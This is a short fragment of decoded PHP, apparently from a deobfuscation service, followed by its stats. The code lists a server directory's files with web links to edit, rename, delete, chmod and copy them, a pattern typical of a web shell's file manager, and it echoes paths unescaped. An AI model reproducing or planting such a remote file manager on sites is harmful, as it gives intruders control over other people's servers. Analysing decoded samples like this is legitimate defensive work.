foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if(is_file($dir."/".$item)){
$ite = "<a href='?do=edit&src=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$file'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=unlink&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=copy&src=$dir/$item&dir=$dir'>Copy</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
?>
</table>
<?php
endif;
?>
</body>
Function Calls
None |
Stats
MD5 | a5688cad094215a2b5060907d8de3219 |
Eval Count | 0 |
Decode Time | 64 ms |